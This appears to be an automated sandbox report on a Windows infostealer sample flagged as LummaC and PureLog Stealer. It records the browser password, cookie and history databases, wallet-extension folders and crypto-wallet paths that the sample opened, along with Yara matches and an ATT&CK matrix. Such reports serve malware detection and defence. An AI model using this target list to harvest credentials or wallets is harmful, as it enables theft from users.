Source: MSBuild.exe, 00000002.00000002.2115916035.0000000001049000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Jaxx Liberty
Source: MSBuild.exe, 00000002.00000002.2115916035.0000000000FEF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: MSBuild.exe, 00000002.00000002.2115916035.0000000000FEF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: MSBuild.exe, 00000002.00000002.2115916035.0000000001049000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Exodus
Source: MSBuild.exe, 00000002.00000002.2115916035.0000000000FEF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum
Source: MSBuild.exe, 00000002.00000002.2115916035.0000000001049000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, 00000000.00000000.1979414026.00000000003F2000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: set_UseMachineKeyStore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Directory queried: C:\Users\user\Documents\EEGWXUHVUG	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Directory queried: C:\Users\user\Documents\SQSJKEBWDT	Jump to behavior

Source: Yara match

File source: Process Memory Space: MSBuild.exe PID: 5316, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 5316, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe, type: SAMPLE
Source: Yara match	File source: 0.0.SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe.3f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1979414026.00000000003F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.9123.22048.exe

Code function: 0_2_6CEAA0C0 CorBindToRuntimeEx,GetModuleHandleW,GetModuleHandleW,__cftoe,GetModuleHandleW,GetProcAddress,

0_2_6CEAA0C0

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	1 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	311 Process Injection	11 Deobfuscate/Decode Files or Information	LSASS Memory	1 File and Directory Discovery	Remote Desktop Protocol	31 Data from Local System	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
